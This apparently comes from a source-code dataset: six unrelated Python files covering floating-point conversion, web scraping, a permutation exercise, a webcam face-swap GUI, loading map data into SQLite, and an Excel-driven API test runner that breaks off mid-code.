+{"seq_id":"53649177","text":"class FloatingPoint:\n origValue = None\n sign = None\n exponent = None\n mantissa = None\n\n def outputToFile(self):\n return format(self.origValue, '013b') + \"\\n\" + format(self.sign, '01b') + \"\\n\" + format(self.exponent, '03b') + \"\\n\" + format(self.mantissa, '05b') + '\\n'\n\n def __str__(self):\n twosComp = None\n if self.origValue > 4095:\n twosComp = -8192 + self.origValue\n else:\n twosComp = self.origValue\n return format(twosComp, 'd') + \",\" + format(self.origValue, '013b') + \",\" + format(self.sign, '01b') + \",\" + format(self.exponent, '03b') + \",\" + format(self.mantissa, '05b')\n\ndef convertNumber(number):\n result = FloatingPoint()\n result.origValue = number\n if number & 0b1000000000000: #\"negative\"\n result.sign = 1\n number = 8192 - number\n else:\n result.sign = 0\n if number > 3968:\n result.exponent = 7\n result.mantissa = 31\n return result \n \n exponentTemp = 0\n mantissaTemp = 0\n\n if (number >> 12) & 0b1:\n exponentTemp = 7\n elif (number>>11) & 0b1:\n exponentTemp = 7\n elif (number>>10) & 0b1:\n exponentTemp = 6\n elif (number>>9) & 0b1:\n exponentTemp = 5\n elif (number>>8) & 0b1:\n exponentTemp = 4\n elif (number>>7) & 0b1:\n exponentTemp = 3\n elif (number>>6) & 0b1:\n exponentTemp = 2\n elif (number>>5) & 0b1:\n exponentTemp = 1\n else:\n exponentTemp = 0\n\n mantissaTemp = (number >> exponentTemp) & 0b11111\n if number == 4096:\n mantissaTemp = 31\n exponentTemp = 7\n \n sixthBit = None\n\n if exponentTemp == 0:\n sixthBit = 0 \n else:\n sixthBit = (number >> (exponentTemp-1)) & 0b1\n \n if sixthBit and mantissaTemp == 31 and exponentTemp != 7:\n #case where it overflows, so (31+1)/2 = 16, exp + 1\n #but only do this if exp isn't already max\n exponentTemp += 1\n mantissaTemp = 0b10000\n elif sixthBit and mantissaTemp < 31:\n #we need to round, but only when it won't oveflow\n mantissaTemp += 1\n \n result.exponent = exponentTemp\n result.mantissa = mantissaTemp\n return result\n\ndef convertAllNumbers():\n result = None\n START_NUM = 0\n END_NUM = 8191\n f = open('../Project2/progConversion.txt', 'w')\n for i in range(START_NUM, END_NUM+1):\n result = convertNumber(i)\n f.write(result.outputToFile())\n if i == 0 or i == 1 or i == 3967 or i == 3840 or i == 3968 or i == 3969 or i == 4095 or i == 4096 or i == 4097 or i == 8190 or i == 8191:\n print(result)\n f.close()\n\nif __name__ == \"__main__\":\n convertAllNumbers()","sub_path":"Project 2 Final/generateAnswers.py","file_name":"generateAnswers.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"650216477","text":"import requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\ndef heating(data):\n page = requests.get('http://www.worldclimate.com/cgi-bin/grid.pl?gr=N39W105')\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # print(soup)# prints all html used in the page\n AllheatingDays = soup.find_all('a', href=True, text='Heating Degree Days')\n for link in AllheatingDays:\n linkTag = link.get('href')\n\n # Podemos manipular linkTag para solo obtener el pedazo de estring que queremos\n print(linkTag,\"PRINTING EACH TAG\")\n print(type(linkTag))\n\n #linkTag[-7:]\n\n new_url = 'http://www.worldclimate.com/cgi-bin/' + linkTag\n # print(new_url)\n\n page_2 = requests.get(new_url)\n soup_2 = BeautifulSoup(page_2.content, 'html.parser')\n\n # we ignore the C at index 0\n antero_table = soup_2.find_all('td')[1].get_text()\n #print(antero_table) # imprime los numeros con el C y F\n\n list_of_strgs = antero_table.split() # split by space\n #nota: esta separados pero cada numero cuenta como un digit aqun que esten juntos\n # print(list_of_strgs)\n # print(type(antero_table))\n # print(len(antero_table))\n\n list_of_strgs = list_of_strgs[:13]\n print(list_of_strgs)\n\n diccionario = {}\n diccionario[linkTag[-7:]] = {}\n diccionario[linkTag[-7:]]['Heating Degree Days'] = list_of_strgs\n print(diccionario)\n\n \n return\n\n \nnom = heating('data.pl?ref=N39W105+1306+050263C')\n\n","sub_path":"practice_final2.py","file_name":"practice_final2.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"562589209","text":"# Exercise Break: How many permutations of length 200 have exactly 199 adjacencies?\n\n# Adjacency is defined as a adjacent pair in the permutation where the 2nd value is 1 ahead of the first: (n, n+1)\n# Do tests for smaller dimensions and try to pick out a pattern...\n\nfrom itertools import permutations, product\nfrom typing import List\n\nfrom helpers.Utils import slide_window\n\n\ndef count_adj(p: List[int]) -> int:\n return sum(1 if x1 + 1 == x2 else 0 for (x1, x2), _ in slide_window(p, 2))\n\n\ndef count_bp(p: List[int]) -> int:\n return sum(0 if x1 + 1 == x2 else 1 for (x1, x2), _ in slide_window(p, 2))\n\n\ndef test(count: int):\n found = set()\n for n in permutations(range(0, count + 2)): # instead of 1 to n, the chapter now says to make it 0 to n+1 where 0 and n+1 are implied AND fixed into place\n for signed_n in product(*([n[i], -n[i]] for i in range(len(n)))):\n if signed_n[0] != 0 or signed_n[-1] != count + 1: # 0 and n+1 must be fixed into place at first and last idx respectively\n continue\n adjs = count_adj(list(signed_n))\n if adjs == count - 1:\n found.add(signed_n)\n print(f'{len(found)} -- {found}')\n\n\ntest(3) # 6 -- {(0, 1, -3, -2, 4), (0, 1, 2, -3, 4), (0, -2, -1, 3, 4), (0, -3, -2, -1, 4), (0, 1, -2, 3, 4), (0, -1, 2, 3, 4)}\ntest(4) # 10 -- {(0, -4, -3, -2, -1, 5), (0, 1, 2, 3, -4, 5), (0, 1, -4, -3, -2, 5), (0, -2, -1, 3, 4, 5), (0, 1, -3, -2, 4, 5), (0, -1, 2, 3, 4, 5), (0, 1, 2, -3, 4, 5), (0, -3, -2, -1, 4, 5), (0, 1, 2, -4, -3, 5), (0, 1, -2, 3, 4, 5)}\ntest(5) # 15 -- {(0, 1, 2, 3, 4, -5, 6), (0, 1, 2, -3, 4, 5, 6), (0, -2, -1, 3, 4, 5, 6), (0, 1, -3, -2, 4, 5, 6), (0, 1, 2, 3, -5, -4, 6), (0, 1, 2, -5, -4, -3, 6), (0, -4, -3, -2, -1, 5, 6), (0, 1, 2, 3, -4, 5, 6), (0, -5, -4, -3, -2, -1, 6), (0, 1, -2, 3, 4, 5, 6), (0, -3, -2, -1, 4, 5, 6), (0, 1, 2, -4, -3, 5, 6), (0, -1, 2, 3, 4, 5, 6), (0, 1, -5, -4, -3, -2, 6), (0, 1, -4, -3, -2, 5, 6)}\n\n# The pattern seems to be for n, n+n-1+n-2+...+1 3 it's 3 + 1. So for 100, ...:\nprint(f'{sum(range(1, 200 + 1))}') # 20100\n","sub_path":"docs/data/learn/Bioinformatics/input/ch6_code/src/Stepik.6.5.ExerciseBreak.PermutationsOfLength200With199Adjacencies.py","file_name":"Stepik.6.5.ExerciseBreak.PermutationsOfLength200With199Adjacencies.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"380249367","text":"from PIL import Image, ImageTk\nimport tkinter as tkinter\nimport numpy\nfrom datetime import datetime\nimport cv2\nfrom imutils import resize\nimport Settings\nimport ImageProcessor\nfrom Society import Society\nfrom Person import Person\nfrom Feelings import Crowdedness\nfrom Feelings import Loneliness\nfrom imutils.video import WebcamVideoStream\n\ncv2.namedWindow(\"MultipersonD\", cv2.WINDOW_KEEPRATIO)\n#cv2.setWindowProperty(\"MultipersonD\", cv2.WND_PROP_ASPECTRATIO, cv2.WINDOW_KEEPRATIO)\n\nclass MultipersonD:\n def __init__(self):\n print(cv2.useOptimized())\n #self.video_Capture = WebcamVideoStream(src=0, name =\"s\") # capture video frames, 0 is your default video camera\n # self.video_Capture.stream.set(3, 1280)\n #self.video_Capture.stream.set(4, 720)\n #print(\"Resolution: {}x{}\".format(self.video_Capture.stream.get(3), self.video_Capture.stream.get(4)))\n\n #self.video_Capture.start()\n self.video_Capture = cv2.VideoCapture(0)\n print(\"Resolution: {}x{}\".format(self.video_Capture.get(3), self.video_Capture.get(4)))\n self.current_image = None # current image from the camera\n\n # Storage\n self.society = Society('../data/*.jpg')\n\n \"\"\" GUI \"\"\"\n self.main_window = tkinter.Tk() # initialize root window\n self.main_window.title(\"Multiperson D\") # set window title\n # self.destructor function gets fired when the window is closed\n self.main_window.protocol('WM_DELETE_WINDOW', self.destructor)\n\n self.is_fullscreen = False\n self.main_window.bind(\"\", self.toggle_fullscreen)\n\n self.pn_settings = tkinter.Label(self.main_window) # initialize image panel\n self.pn_settings.pack(side='left')\n\n \"\"\" resolution \"\"\"\n self.gr_resolution = tkinter.LabelFrame(self.pn_settings, text=\"Resolution\")\n self.gr_resolution.pack(fill=\"both\", expand=False)\n\n self.pn_resolution_options = tkinter.Label(self.gr_resolution) # initialize image panel\n self.pn_resolution_options.pack(fill=\"both\", expand=False)\n\n self.resolution_value = tkinter.StringVar()\n self.resolution_value.set(\"640x480\") # initialize\n\n for text, mode in Settings.RESOLUTION_MODES:\n b = tkinter.Radiobutton(self.pn_resolution_options, text=text, variable=self.resolution_value, value=mode)\n b.pack(side='left')\n\n self.lbl_resolution = tkinter.Label(self.gr_resolution, text=\"none\")\n self.lbl_resolution.pack(side='bottom')\n\n self.chk_mirror_value = tkinter.IntVar()\n self.chk_mirror_value.set(Settings.MIRROR) # set check state\n chk_mirror = tkinter.Checkbutton(self.gr_resolution, text='Mirror', var=self.chk_mirror_value)\n chk_mirror.pack(side='left')\n\n self.chk_rotate_value = tkinter.IntVar()\n self.chk_rotate_value.set(Settings.ROTATE) # set check state\n chk_rotate = tkinter.Checkbutton(self.gr_resolution, text='Rotate', var=self.chk_rotate_value)\n chk_rotate.pack(side='left')\n\n \"\"\" FACE PARTS \"\"\"\n self.gr_face_parts = tkinter.LabelFrame(self.pn_settings, text=\"Face parts\")\n self.gr_face_parts.pack(fill=\"both\", expand=False)\n\n self.pn_brows = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.pn_brows.pack(fill=\"both\", expand=False)\n\n self.chk_left_brow_value = tkinter.IntVar()\n self.chk_left_brow_value.set(Settings.SWAP_LEFT_BROW) # set check state\n chk_left_brow = tkinter.Checkbutton(self.pn_brows, text='Left Brow', var=self.chk_left_brow_value)\n chk_left_brow.pack(side='left')\n\n self.chk_right_brow_value = tkinter.IntVar()\n self.chk_right_brow_value.set(Settings.SWAP_RIGHT_BROW) # set check state\n 
chk_right_brow = tkinter.Checkbutton(self.pn_brows, text='Right Brow', var=self.chk_right_brow_value)\n chk_right_brow.pack(side='left')\n\n self.pn_eyes = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.pn_eyes.pack(fill=\"both\", expand=False)\n\n self.chk_swap_left_eye_value = tkinter.IntVar()\n self.chk_swap_left_eye_value.set(Settings.SWAP_LEFT_EYE) # set check state\n chk_swap_left_eye = tkinter.Checkbutton(self.pn_eyes, text='Left Eye', var=self.chk_swap_left_eye_value)\n chk_swap_left_eye.pack(side='left')\n\n self.chk_swap_right_eye_value = tkinter.IntVar()\n self.chk_swap_right_eye_value.set(Settings.SWAP_RIGHT_EYE) # set check state\n chk_swap_right_eye = tkinter.Checkbutton(self.pn_eyes, text='Right Eye', var=self.chk_swap_right_eye_value)\n chk_swap_right_eye.pack(side='left')\n\n self.cheeks_panel = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.cheeks_panel.pack(fill=\"both\", expand=False)\n\n self.chk_swap_left_cheek_value = tkinter.IntVar()\n self.chk_swap_left_cheek_value.set(Settings.SWAP_LEFT_CHEEK) # set check state\n chk_swap_left_cheek = tkinter.Checkbutton(self.cheeks_panel, text='Left Cheek', var=self.chk_swap_left_cheek_value)\n chk_swap_left_cheek.pack(side='left')\n\n self.chk_swap_right_cheek_value = tkinter.IntVar()\n self.chk_swap_right_cheek_value.set(Settings.SWAP_RIGHT_CHEEK) # set check state\n chk_swap_right_cheek = tkinter.Checkbutton(self.cheeks_panel, text='Right Cheek', var=self.chk_swap_right_cheek_value)\n chk_swap_right_cheek.pack(side='left')\n\n self.other_parts_panel = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.other_parts_panel.pack(fill=\"both\", expand=False)\n\n self.chk_swap_nose_value = tkinter.IntVar()\n self.chk_swap_nose_value.set(Settings.SWAP_NOSE) # set check state\n chk_swap_nose = tkinter.Checkbutton(self.other_parts_panel, text='Nose', var=self.chk_swap_nose_value)\n chk_swap_nose.pack(side='left')\n\n self.chk_swap_mouth_value = tkinter.IntVar()\n self.chk_swap_mouth_value.set(Settings.SWAP_MOUTH) # set check state\n chk_swap_mouth = tkinter.Checkbutton(self.other_parts_panel, text='Mouth', var=self.chk_swap_mouth_value)\n chk_swap_mouth.pack(side='left')\n\n self.chk_swap_face_value = tkinter.IntVar()\n self.chk_swap_face_value.set(Settings.SWAP_FACE) # set check state\n chk_swap_face = tkinter.Checkbutton(self.other_parts_panel, text='Forehead', var=self.chk_swap_face_value)\n chk_swap_face.pack(side='left')\n\n \"\"\"DEBUG\"\"\"\n self.debug_group = tkinter.LabelFrame(self.pn_settings, text=\"Debug\")\n self.debug_group.pack(fill=\"both\", expand=False)\n\n self.scale = tkinter.Scale(self.debug_group, from_=10, to=100, tickinterval=10, orient='horizontal')\n self.scale.set(int(Settings.SCALE_FACTOR*100))\n self.scale.pack(fill=\"both\", expand=True)\n\n self.chk_detect_faces_value = tkinter.IntVar()\n self.chk_detect_faces_value.set(Settings.DETECT_FACES) # set check state\n chk_detect_faces = tkinter.Checkbutton(self.debug_group, text='Detect Faces', var=self.chk_detect_faces_value)\n chk_detect_faces.pack(side='left')\n\n self.chk_demo_mode_value = tkinter.IntVar()\n self.chk_demo_mode_value.set(Settings.DEMO_MODE) # set check state\n chk_demo_mode = tkinter.Checkbutton(self.debug_group, text='Demo Mode', var=self.chk_demo_mode_value)\n chk_demo_mode.pack(side='left')\n\n self.lbl_random = tkinter.Label(self.debug_group, text=\"Random Duration\")\n self.lbl_random.pack(side=\"left\")\n\n self.random_face_duration = tkinter.Scale(self.debug_group, from_=1, to=100, 
tickinterval=10, orient='horizontal')\n self.random_face_duration.set(Settings.RANDOM_FACE_DURATION)\n self.random_face_duration.pack(fill=\"both\", expand=True)\n\n \"\"\"MASK\"\"\"\n self.mask_group = tkinter.LabelFrame(self.pn_settings, text=\"Mask\")\n self.mask_group.pack(side='left')\n\n self.lbl_pad_x = tkinter.Label(self.mask_group, text=\"Pad X\")\n self.lbl_pad_x.pack(fill=\"both\", expand=True)\n\n self.mask_pad_x = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_x.set(Settings.MASK_PAD_X)\n self.mask_pad_x.pack(fill=\"both\", expand=False)\n\n self.mask_pad_x_minus = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_x_minus.set(Settings.MASK_PAD_X_MINUS)\n self.mask_pad_x_minus.pack(fill=\"both\", expand=True)\n\n self.lbl_pad_y = tkinter.Label(self.mask_group, text=\"Pad Y\")\n self.lbl_pad_y.pack(fill=\"both\", expand=True)\n\n self.mask_pad_y = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_y.set(Settings.MASK_PAD_Y)\n self.mask_pad_y.pack(fill=\"both\", expand=True)\n\n self.mask_pad_y_minus = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_y_minus.set(Settings.MASK_PAD_Y_MINUS)\n self.mask_pad_y_minus.pack(fill=\"both\", expand=True)\n\n self.chk_feather_mask_value = tkinter.IntVar()\n self.chk_feather_mask_value.set(Settings.FEATHER_MASK) # set check state\n chk_feather_mask = tkinter.Checkbutton(self.mask_group, text='Feather mask', var=self.chk_feather_mask_value)\n chk_feather_mask.pack(side=\"left\")\n\n self.mask_feather = tkinter.Scale(self.mask_group, from_=1, to=100, tickinterval=10, orient='horizontal')\n self.mask_feather.set(Settings.FEATHER_AMOUNT)\n self.mask_feather.pack(fill=\"both\", expand=True)\n\n \"\"\"Colors\"\"\"\n self.colors_group = tkinter.LabelFrame(self.pn_settings, text=\"Colors\")\n self.colors_group.pack(side='left')\n\n self.chk_correct_colors_value = tkinter.IntVar()\n self.chk_correct_colors_value.set(Settings.CORRECT_COLORS) # set check state\n chk_correct_colors = tkinter.Checkbutton(self.colors_group, text='Correct Colors', var=self.chk_correct_colors_value)\n chk_correct_colors.pack(side='left')\n\n self.color_blur = tkinter.Scale(self.colors_group, from_=1, to=100, tickinterval=10, orient='horizontal')\n self.color_blur.set(Settings.COLOUR_CORRECT_BLUR_FRAC*100)\n self.color_blur.pack(fill=\"both\", expand=True)\n\n self.chk_blur_result_value = tkinter.IntVar()\n self.chk_blur_result_value.set(Settings.BLUR_RESULT) # set check state\n chk_blur_result = tkinter.Checkbutton(self.colors_group, text='Blur result',\n var=self.chk_blur_result_value)\n chk_blur_result.pack(side='left')\n\n self.blur_result_amount = tkinter.Scale(self.colors_group, from_=1, to=100, tickinterval=10, orient='horizontal')\n self.blur_result_amount.set(Settings.BLUR_RESULT_AMOUNT)\n self.blur_result_amount.pack(fill=\"both\", expand=True)\n\n \"\"\" Apply button \"\"\"\n btn = tkinter.Button(self.pn_settings, text=\"Apply Settings\", command=self.apply_settings)\n btn.pack(fill=\"both\", expand=True)\n\n self.lbl_fps = tkinter.Label(self.gr_resolution, text=\"none\")\n self.lbl_fps.pack(side='bottom')\n\n self.demo_frame = resize(self.society.persons[1].image, height=480)\n # start a self.video_loop that constantly pools the video sensor\n # for the most recently read frame\n self.video_loop()\n\n def video_loop(self):\n loop_start_time = 
datetime.now()\n print(\"!!!!!!!!!!!!!!!!!!!!!!!\")\n \"\"\" Get frame from the video stream and show it in Tkinter \"\"\"\n self.society.create_random_setting()\n\n ok, frame = self.video_Capture.read() # read frame from video stream\n if ok: # frame captured without any errors\n if Settings.MIRROR:\n frame = cv2.flip(frame, +1)\n if Settings.ROTATE:\n frame = cv2.rotate(frame, rotateCode=cv2.ROTATE_90_COUNTERCLOCKWISE)\n if Settings.DETECT_FACES:\n try:\n if(Settings.DEMO_MODE):\n frame = self.demo_frame\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame_face = ImageProcessor.get_landmarks(frame_gray)\n start_time = datetime.now()\n\n self.face = Person(frame, frame_gray, frame_face, False)\n\n self.society.interact(self.face)\n result = self.face.image\n\n end_time = datetime.now()\n delta = end_time - start_time\n print(\"SWAP: {}\".format(delta.total_seconds()))\n\n except Loneliness:\n result = frame\n #result = cv2.stylization(frame, sigma_s=20, sigma_r=0.001)\n #result = cv2.detailEnhance(frame, sigma_s=10, sigma_r=0.15)\n #result = numpy.zeros(frame.shape[:2], dtype=frame.dtype)\n #result = numpy.array([result, result, result]).transpose((1, 2, 0))\n except Crowdedness:\n result = frame\n else:\n result = frame\n if Settings.BLUR_RESULT == 1:\n result = cv2.medianBlur(result, Settings.BLUR_RESULT_AMOUNT)\n cv2.imshow(\"MultipersonD\", result)\n\n loop_end_time = datetime.now()\n delta = loop_end_time - loop_start_time\n if delta.total_seconds() > 0:\n self.lbl_fps.config(text=\"FPS: {}\".format(1/delta.total_seconds()))\n\n self.lbl_resolution.config(text=\"Real Resolution: {}x{}\".format(self.video_Capture.get(3), self.video_Capture.get(4)))\n print(\"???????????????????????????\")\n self.main_window.after(10, self.video_loop) # call the same function after 30 milliseconds\n\n def apply_settings(self):\n Settings.SWAP_RIGHT_CHEEK = self.chk_swap_right_cheek_value.get()\n Settings.SWAP_LEFT_CHEEK = self.chk_swap_left_cheek_value.get()\n Settings.SWAP_RIGHT_BROW = self.chk_right_brow_value.get()\n Settings.SWAP_LEFT_EYE = self.chk_swap_left_eye_value.get()\n Settings.SWAP_RIGHT_EYE = self.chk_swap_right_eye_value.get()\n Settings.SWAP_NOSE = self.chk_swap_nose_value.get()\n Settings.SWAP_MOUTH = self.chk_swap_mouth_value.get()\n Settings.SWAP_LEFT_BROW = self.chk_left_brow_value.get()\n Settings.SWAP_FACE = self.chk_swap_face_value.get()\n\n Settings.DETECT_FACES = self.chk_detect_faces_value.get()\n Settings.SCALE_FACTOR = self.scale.get()/100\n Settings.DEMO_MODE = self.chk_demo_mode_value.get()\n Settings.RANDOM_FACE_DURATION = self.random_face_duration.get()\n\n resolution = self.resolution_value.get()\n if resolution != Settings.RESOLUTION:\n self.set_resolution(resolution)\n\n f = self.mask_feather.get()\n if f % 2 == 0:\n f = f+1\n Settings.FEATHER_AMOUNT = f\n\n Settings.FEATHER_MASK = self.chk_feather_mask_value.get()\n Settings.MASK_PAD_X = self.mask_pad_x.get()\n Settings.MASK_PAD_Y = self.mask_pad_y.get()\n Settings.MASK_PAD_X_MINUS = self.mask_pad_x_minus.get()\n Settings.MASK_PAD_Y_MINUS = self.mask_pad_y_minus.get()\n\n Settings.CORRECT_COLORS = self.chk_correct_colors_value.get()\n Settings.COLOUR_CORRECT_BLUR_FRAC = self.color_blur.get() / 100\n\n Settings.BLUR_RESULT = self.chk_blur_result_value.get()\n b = self.blur_result_amount.get()\n if b % 2 == 0:\n b = b + 1\n\n Settings.BLUR_RESULT_AMOUNT = b\n\n Settings.MIRROR = self.chk_mirror_value.get()\n Settings.ROTATE = self.chk_rotate_value.get()\n\n def set_resolution(self, resolution):\n 
self.video_Capture.release()\n self.video_Capture = cv2.VideoCapture(0)\n if resolution == \"160x120\":\n self.video_Capture.set(3, 160)\n self.video_Capture.set(4, 120)\n elif resolution == \"176x144\":\n self.video_Capture.set(3, 176)\n self.video_Capture.set(4, 144)\n elif resolution == \"320x240\":\n self.video_Capture.set(3, 320)\n self.video_Capture.set(4, 240)\n elif resolution == \"352x288\":\n self.video_Capture.set(3, 352)\n self.video_Capture.set(4, 288)\n elif resolution == \"640x480\":\n self.video_Capture.set(3, 640)\n self.video_Capture.set(4, 480)\n elif resolution == \"800x600\":\n self.video_Capture.set(3, 800)\n self.video_Capture.set(4, 600)\n elif resolution == \"1024x768\":\n self.video_Capture.set(3, 1024)\n self.video_Capture.set(4, 768)\n elif resolution == \"1280x1024\":\n self.video_Capture.set(3, 1280)\n self.video_Capture.set(4, 1024)\n\n Settings.RESOLUTION = resolution\n\n def toggle_fullscreen(self, event=None):\n self.is_fullscreen = not self.is_fullscreen # Just toggling the boolean\n\n if self.is_fullscreen:\n cv2.setWindowProperty(\"MultipersonD\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n else:\n cv2.setWindowProperty(\"MultipersonD\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_NORMAL)\n\n return \"break\"\n\n def destructor(self):\n \"\"\" Destroy the root object and release all resources \"\"\"\n print(\"[INFO] closing...\")\n self.main_window.destroy()\n self.video_Capture.release()\n #self.video_Capture.stop();\n # release web camera\n cv2.destroyAllWindows() # it is not mandatory in this application\n\n\n# start the app\nprint(\"[INFO] starting...\")\nmultipersonD = MultipersonD()\nmultipersonD.main_window.mainloop()\n","sub_path":"src/scripts/MultipersonD.py","file_name":"MultipersonD.py","file_ext":"py","file_size_in_byte":17699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"247884208","text":"from bhmap_database import *\nimport sys\nimport os\nimport urllib.request as request\nfrom pprint import pprint\nimport json\nimport codecs\nimport sqlite3 as sl\n\nappdata_path = './'\n\ndef main(argc, argv):\n srsName = 'EPSG:4326'\n quadras = get_bhmap_data(featureName='ide_bhgeo:QUADRA_CTM', local=True, srsName=srsName)['features']\n conn = sl.connect('BHMap.db')\n c = conn.cursor()\n\n #c.execute('CREATE TABLE quadras (codigo integer, id integer, status text)')\n for q in quadras:\n codigo = int(q['properties']['CODIGO'])\n id = int(q['properties']['ID'])\n status = q['properties']['STATUS']\n print(codigo, id)\n c.execute(\"INSERT INTO quadras VALUES ({:d}, {:d}, '{:s}')\".format(codigo, id, status))\n \n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n main(len(sys.argv), sys.argv)\n sys.exit()\n \ndef get_bhmap_data(featureName, properties=None, sortBy=None, cql_filter=None, local=False, bbox=None, srsName='EPSG:4326'):\n url_part1 = 'http://bhmap-hm.pbh.gov.br/v2/api/wfs?service=WFS&version=2.0.0'\n url_part2 = \"&request=GetFeature&typeName={:s}&srsName={:s}&outputFormat=application%2Fjson\".format(featureName, srsName)\n if properties:\n url_part2 = url_part2 + '&propertyName={:s}'.format(properties[0])\n for i in range(1, len(properties)):\n url_part2 = url_part2 + ',' + properties[i]\n if sortBy:\n url_part2 = url_part2 + '&sortBy={:s}'.format(sortBy)\n if bbox:\n url_part2 = url_part2 + '&BBox={:.8f},{:.8f},{:.8f},{:.8f}'.format(bbox[0],\\\n bbox[1],\\\n bbox[2],\\\n bbox[3])\n if cql_filter:\n url_part2 = url_part2 + '&cql_filter=' + cql_filter\n \n url = url_part1 + url_part2\n\n if local:\n extension = '.json'\n filename = \"\"\n for c in url_part2: \n if c.isalnum(): filename += c\n filepath = appdata_path + 'bhmap/' + filename + extension\n \n if not os.path.isfile(filepath):\n res = request.urlopen(url)\n response = res.read()\n print(res.geturl())\n print(res.info())\n sys.stdout.flush()\n j = json.loads(response.decode('utf8'))\n file = open(filepath, 'w')\n json.dump(j, file, sort_keys=True, indent=4)\n return j\n else:\n file = open(filepath, 'r')\n return json.load(file)\n else:\n res = request.urlopen(url)\n response = res.read()\n print(res.geturl())\n print(res.info())\n sys.stdout.flush()\n return json.loads(response.decode('utf8'))\n \n","sub_path":"code/python/bhmapdb/bhmap_database.py","file_name":"bhmap_database.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"531474652","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport json\nimport http.client,mimetypes\nfrom urllib.parse import urlencode\nimport random\nimport time\nimport re\nimport logging\nimport os,sys\nimport xlrd\nfrom pyDes import *\nimport hashlib\nimport base64\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\n# # 打印日志\n# log_file = os.path.join(os.getcwd(),'log/liveappapi.log')\n# log_format = '[%(asctime)s] [%(levelname)s] %(message)s'\n# logging.basicConfig(format=log_format,filename=log_file,filemode='w',level=logging.DEBUG)\n# console = logging.StreamHandler()\n# console.setLevel(logging.DEBUG)\n# formatter = logging.Formatter(log_format)\n# console.setFormatter(formatter)\n# logging.getLogger('').addHandler(console)\n\n\n# 反转字典的键和值\ndef invert_dict(d):\n return dict((v, k) for k, v in d.iteritems())\n\n\n# 获取用例并执行测试用例\ndef runTest(testCase_file, sheet_name):\n # 读取文件\n testCaseFile = os.path.join(os.getcwd(), testCase_file)\n if not os.path.exists(testCaseFile):\n logging.error('测试用例文件不存在!!!')\n sys.exit()\n testCase = xlrd.open_workbook(testCaseFile)\n # 读取第一个sheet\n table = testCase.sheet_by_name(sheet_name)\n # 初始化失败case\n errorCase = []\n correlationDict = {}\n correlationDict['${hashPassword}'] = hash1Encode('123456')\n correlationDict['${session}'] = None\n\n # 将列名组装成字典(列名为键,列数为值)\n row_name = table.row_values(1)\n row_val = []\n for i in range(0, len(row_name)):\n row_val.append(i)\n # 将row_name、row_val两个列表组合成字典\n rows = dict(zip(row_name, row_val))\n\n for i in range(2, table.nrows):\n correlationDict['${randomEmail}'] = ''.join(random.sample('abcdefghijklmnopqrstuvwxyz', 6)) + '@automation.test'\n correlationDict['${randomTel}'] = '186' + str(random.randint(10000000, 99999999))\n correlationDict['${timestamp}'] = int(time.time())\n if table.cell(i, rows['Active']).value.replace('\\n', '').replace('\\r', '') != 'Yes':\n continue\n request_url = table.cell(i, rows['Request URL']).value.replace('\\n', '').replace('\\r', '')\n num = table.cell(i, rows['No.']).value.replace('\\n', '').replace('\\r', '')\n if request_url == '' or num == '':\n print('sth empty')\n continue\n api_purpose = table.cell(i, rows['API Purpose']).value.replace('\\n', '').replace('\\r', '')\n api_host = table.cell(i, rows['API Host']).value.replace('\\n', '').replace('\\r', '')\n\n request_method = table.cell(i, rows['Request Method']).value.replace('\\n', '').replace('\\r', '')\n request_data_type = table.cell(i, rows['Request Data Type']).value.replace('\\n', '').replace('\\r', '')\n request_data = table.cell(i, rows['Request Data']).value.replace('\\n', '').replace('\\r', '')\n encryption = table.cell(i, rows['Encryption']).value.replace('\\n', '').replace('\\r', '')\n check_point = table.cell(i, rows['Check Point']).value\n correlation = table.cell(i, rows['Correlation']).value.replace('\\n', '').replace('\\r', '').split(';')\n isContains = table.cell(i, rows['isContains']).value.replace('\\n', '').replace('\\r', '')\n for key in correlationDict:\n if request_url.find(key) > 0:\n request_url = request_url.replace(key, str(correlationDict[key]))\n if request_data_type == 'Form':\n dataFile = request_data\n if os.path.exists(dataFile):\n fopen = open(dataFile, encoding='utf-8')\n request_data = fopen.readline()\n fopen.close()\n for keyword in correlationDict:\n if request_data.find(keyword) > 0:\n request_data = request_data.replace(keyword, str(correlationDict[keyword]))\n try:\n if encryption == 'MD5':\n request_data = json.loads(request_data)\n status, md5 = 
